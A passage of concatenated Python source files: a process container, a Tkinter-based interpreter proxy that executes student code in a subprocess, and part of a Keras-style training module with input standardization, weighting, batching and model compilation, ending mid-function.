{Bool} -- Returns true if id exists, false otherwise
"""
return Id in self._processList
@property
def ProcessList(self):
"""Gets the process list dictionary for the Process
Container
"""
return self._processList
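
# --- Editor's illustrative sketch (not part of the original module) ---
# A hedged example of how MultiProcess and ProcessContainer could be used
# together. The worker function below is hypothetical; the __main__ guard is
# needed because multiprocessing may re-import this module in child processes.
def _demo_worker():
    print("hello from pid", os.getpid())

if __name__ == "__main__":
    container = ProcessContainer()
    process = MultiProcess()
    container.add_or_delete_processList(process)                  # register the process by its id
    print(container.id_in_processList(process, process.get_id))   # True
    process.run(_demo_worker)                                     # spawn and start the child process
    process.stop()                                                # terminate it again
    container.add_or_delete_processList(process, delete=True)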
|
PyInterpreter.py
|
from StudentRunner import StudentRunner
from FullRunner import FullRunner
from translate import tr
import multiprocessing as mp
import tkinter as tk
import tokenize
import sys
RUN_POLL_DELAY=250
class InterpreterProxy:
"""
This is a multiprocessing proxy for the underlying python interpreter.
"""
def __init__(self, root, mode, filename):
self.comm, there = mp.Pipe()
self.process = mp.Process(target=run_process, args=(there, mode, filename))
self.root = root
def run_evaluation(self, expr, callback):
if not self.process.is_alive():
self.process.start()
def timer_callback():
if self.comm.poll():
ok, report = self.comm.recv()
callback(ok, report)
else:
self.root.after(RUN_POLL_DELAY, timer_callback)
self.comm.send('eval')
self.comm.send(expr)
timer_callback()
def execute(self, callback):
if not self.process.is_alive():
self.process.start()
def timer_callback():
if self.comm.poll():
ok, report = self.comm.recv()
# print("[proxy] RECV: exec ok ? {} report={}".format(ok, report))
callback(ok, report)
else:
self.root.after(RUN_POLL_DELAY, timer_callback)
self.comm.send('exec')
timer_callback()
def kill(self):
if self.process.is_alive():
self.process.terminate()
self.process.join()
return True
else:
return False
def run_process(comm, mode, filename):
root = tk.Tk()
interp = PyInterpreter(root, mode, filename)
def run_loop():
command = comm.recv()
if command == 'eval':
expr = comm.recv()
ok, report = interp.run_evaluation(expr)
comm.send((ok, report))
elif command == 'exec':
ok, report = interp.execute()
# print("[interp] exec ok ? {} report={}".format(ok, report))
comm.send((ok, report))
root.after(10, run_loop)
root.title(tr("Interpretation."))
root.after(10, run_loop)
root.withdraw()
root.mainloop()
class PyInterpreter:
"""
This class runs the code and the checking process, and builds
a report that will be sent to the Console.
"""
def __init__(self, root, mode, filename, source=None):
self.root = root
self.filename = filename
self.source = source
self.mode = mode
# This dictionary keeps the local declarations from the execution of the code.
# It will be used for evaluation.
self.locals = dict()
def run_evaluation(self, expr):
""" Run the evaluation of expr """
output_file = open('interpreter_output', 'w+')
original_stdout = sys.stdout
sys.stdout = output_file
runner = None
if self.mode == "student":
runner = StudentRunner(self.root, self.filename, expr)
else:
runner = FullRunner(self.filename, expr)
ok = runner.evaluate(expr, self.locals)
report = runner.get_report()
begin_report = "=== " + tr("Evaluating: ") + "'" + expr + "' ===\n"
report.set_header(begin_report)
end_report = "\n" + ('=' * len(begin_report)) + "\n\n"
report.set_footer(end_report)
sys.stdout = original_stdout
output_file.close()
return (ok, report)
def execute(self):
""" Execute the runner corresponding to the chosen Python mode """
with tokenize.open(self.filename) as fp:
source = fp.read()
output_file = open('interpreter_output', 'w+')
original_stdout = sys.stdout
sys.stdout = output_file
runner = None
if self.mode == "student":
runner = StudentRunner(self.root, self.filename, source)
else:
runner = FullRunner(self.filename, source)
ok = runner.execute(self.locals)
report = runner.get_report()
import os
begin_report = "=== " + tr("Interpretation of: ") + "'" + os.path.basename(self.filename) + "' ===\n"
len_begin_report = len(begin_report)
# enable?
# if self.mode == 'student':
# begin_report += "# Automatic importation of graphic library\n"
# begin_report += "from studentlib.gfx.image import (draw_line, draw_triangle, fill_triangle\n"
# begin_report += " , draw_ellipse, fill_ellipse\n"
# begin_report += " , overlay, underlay)\n"
# begin_report += "from studentlib.gfx.img_canvas import show_image\n\n"
report.set_header(begin_report)
end_report = "\n" + ('=' * len_begin_report) + "\n\n"
report.set_footer(end_report)
sys.stdout = original_stdout
output_file.close()
return (ok, report)
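
# --- Editor's illustrative sketch (not part of the original module) ---
# A hedged example of driving InterpreterProxy from a Tk main loop. It assumes
# the StudentRunner/FullRunner runners imported above are available and that
# the given file exists; "script.py" and the callback below are illustrative.
def _demo_execute(filename="script.py"):
    """Execute `filename` in a separate interpreter process and print its report."""
    root = tk.Tk()
    root.withdraw()
    proxy = InterpreterProxy(root, mode="student", filename=filename)

    def on_done(ok, report):
        print("execution ok?", ok)
        proxy.kill()
        root.quit()

    proxy.execute(on_done)   # polls the pipe every RUN_POLL_DELAY milliseconds
    root.mainloop()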
|
training.py
|
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
from collections import namedtuple
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalize inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
"""
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise ValueError('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise ValueError('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
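
# Editor's illustrative sketch: a hedged, minimal demonstration of the dict
# branch above; the input names and shapes are made up for the example.
def _demo_standardize_input_data():
    """Normalize a dict of user-provided arrays into the ordered list the model expects."""
    data = {'digits': np.zeros((4, 8)), 'aux': np.ones((4, 2))}
    arrays = standardize_input_data(data,
                                    names=['digits', 'aux'],
                                    shapes=[(None, 8), (None, 2)],
                                    check_batch_axis=False,
                                    exception_prefix='model input')
    return [a.shape for a in arrays]   # [(4, 8), (4, 2)], ordered as `names`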
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list or a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
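
# Editor's illustrative sketch: how a per-output dict of class weights is
# expanded to one entry per output name (a hedged example, names made up).
def _demo_standardize_class_weights():
    class_weight = {'main': {0: 1.0, 1: 3.0}}
    return standardize_class_weights(class_weight, output_names=['main', 'aux'])
    # -> [{0: 1.0, 1: 3.0}, None]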
def check_array_lengths(inputs, targets, weights):
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) != 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
key_losses = {'mean_squared_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
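
# Editor's illustrative sketch: a flat metrics list applies to every output,
# while a dict targets outputs by name (hedged example, names made up).
def _demo_collect_metrics():
    shared = collect_metrics(['accuracy'], output_names=['main', 'aux'])
    per_output = collect_metrics({'main': 'accuracy'}, output_names=['main', 'aux'])
    return shared, per_output
    # -> ([['accuracy'], ['accuracy']], [['accuracy'], []])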
def batch_shuffle(index_array, batch_size):
"""This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
"""
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
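
# Editor's illustrative sketch of the index bookkeeping used by the fit loop:
# contiguous (start, stop) pairs from make_batches, and batch-wise shuffling
# (whole batches are permuted, the order inside each batch is preserved).
def _demo_batching():
    batches = make_batches(size=10, batch_size=4)   # [(0, 4), (4, 8), (8, 10)]
    shuffled = batch_shuffle(np.arange(10), batch_size=4)
    return batches, shuffled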
def slice_X(X, start=None, stop=None):
"""This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X is a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
"""
if isinstance(X, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
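
# Editor's illustrative sketch: slice_X handles a single array or a list of
# arrays, with either a start/stop range or an explicit list of indices.
def _demo_slice_X():
    x = np.arange(12).reshape(6, 2)
    head = slice_X([x, x], 0, 3)      # first 3 rows of each array in the list
    picked = slice_X(x, [0, 2, 5])    # fancy indexing with a list of sample ids
    return [a.shape for a in head], picked.shape   # ([(3, 2), (3, 2)], (3, 2))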
def weighted_objective(fn):
"""Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
"""
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
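
# Editor's illustrative sketch (hedged): wrapping the built-in MSE objective so
# it honours per-sample weights. Evaluating the resulting tensor with K.eval is
# a toy check and assumes a backend of this Keras line (TensorFlow or Theano)
# where constant variables can be evaluated directly.
def _demo_weighted_objective():
    weighted_mse = weighted_objective(objectives.mean_squared_error)
    y_true = K.variable(np.array([[0.0], [1.0], [2.0]]))
    y_pred = K.variable(np.array([[0.0], [1.0], [4.0]]))
    weights = K.variable(np.array([1.0, 1.0, 0.0]))   # the third sample is ignored
    return K.eval(weighted_mse(y_true, y_pred, weights, mask=None))   # ~0.0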
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
"""Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
"""
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise ValueError('sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise ValueError('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise ValueError('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify '
'sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise ValueError('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
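
# Editor's illustrative sketch: turning a class_weight dict into the
# per-sample weight vector used during training (one-hot targets assumed).
def _demo_standardize_weights():
    y = np.array([[1, 0], [0, 1], [1, 0]])   # classes 0, 1, 0
    return standardize_weights(y, class_weight={0: 1.0, 1: 5.0})
    # -> array([1., 5., 1.])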
class GeneratorEnqueuer(object):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, generator, pickle_safe=False):
self._generator = generator
self._pickle_safe = pickle_safe
self._threads = []
self._stop_event = None
self.queue = None
def start(self, nb_worker=1, max_q_size=10, wait_time=0.05):
"""Kick off threads which add data from the generator into the queue.
# Arguments
nb_worker: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._pickle_safe or self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._pickle_safe:
self.queue = multiprocessing.Queue(maxsize=max_q_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue(maxsize=max_q_size)
self._stop_event = threading.Event()
for i in range(nb_worker):
if self._pickle_safe:
# Reset the random seed, otherwise all child processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._pickle_safe:
thread.terminate()
else:
thread.join(timeout)
if self._pickle_safe:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
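
# Editor's illustrative sketch (hedged): feeding batches from a toy generator
# through a background thread with GeneratorEnqueuer. The generator below is
# made up for the example; pickle_safe=False keeps everything in-process.
def _demo_generator_enqueuer():
    def toy_batches():
        while True:
            yield np.random.rand(32, 10), np.random.randint(0, 2, size=(32, 1))
    enqueuer = GeneratorEnqueuer(toy_batches(), pickle_safe=False)
    enqueuer.start(nb_worker=1, max_q_size=4)
    try:
        x_batch, y_batch = enqueuer.queue.get(timeout=5)   # block until one batch is ready
    finally:
        enqueuer.stop(timeout=1)
    return x_batch.shape, y_batch.shape   # ((32, 10), (32, 1))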
class Model(Container):
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weight_mode=None, execute_kwargs=None, **kwargs):
"""Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
execute_kwargs: when using the Tensorflow backend, these arguments
are passed into calls to sess.run(func, feed_dict, **execute_kwargs).
Ignored for Theano backend.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
"""
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif isinstance(loss_weights, dict):
for name in loss_weights:
if name not in self.output_names:
raise ValueError('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif isinstance(loss_weights, list):
if len(loss_weights) != len(self.outputs):
raise ValueError('When passing a list as loss_weights, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise TypeError('Could not interpret loss_weights argument: ' +
str(loss_weights) +
' - expected a list or a dict.')
# prepare loss functions
if isinstance(loss, dict):
for name in loss:
if name not in self.output_names:
raise ValueError('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise ValueError('Output "' + name +
'" missing from loss dictionary.')
loss_functions.append(objectives.get(loss[name]))
elif isinstance(loss, list):
if len(loss) != len(self.outputs):
raise ValueError('When passing a list as loss, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if not isinstance(masks, list):
masks = [masks]
# prepare sample weights
if isinstance(sample_weight_mode, dict):
for name in sample_weight_mode:
if name not in self.output_names:
raise ValueError('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise ValueError('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif isinstance(sample_weight_mode, list):
if len(sample_weight_mode) != len(self.outputs):
raise ValueError('When passing a list as sample_weight_mode, '
'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed '
'sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2,
name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1,
name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2,
name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal'
for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1,
name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i])))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties
# and other layer-specific losses
for loss_tensor in self.losses:
total_loss += loss_tensor
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy
# (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.total_loss = total_loss
self.sample_weights = sample_weights
# these arguments will be passed into calls to sess.run()
# for the TensorFlow backend when executing the functions
# for train, test and predict
self._function_execute_args = execute_kwargs or {}
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
# collect trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise RuntimeError('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.multipliers, self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise RuntimeError('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=None, batch_size=32,
nb_epoch=100, verbose=1, callbacks=None,
val_f=None, val_ins=None, shuffle=True,
callback_metrics=None, initial_epoch=0):
"""Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of the list of display names of the outputs of
`f` and the list of display names of the outputs of `val_f`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
"""
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
out_labels = out_labels or []
# it's possible to call back a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
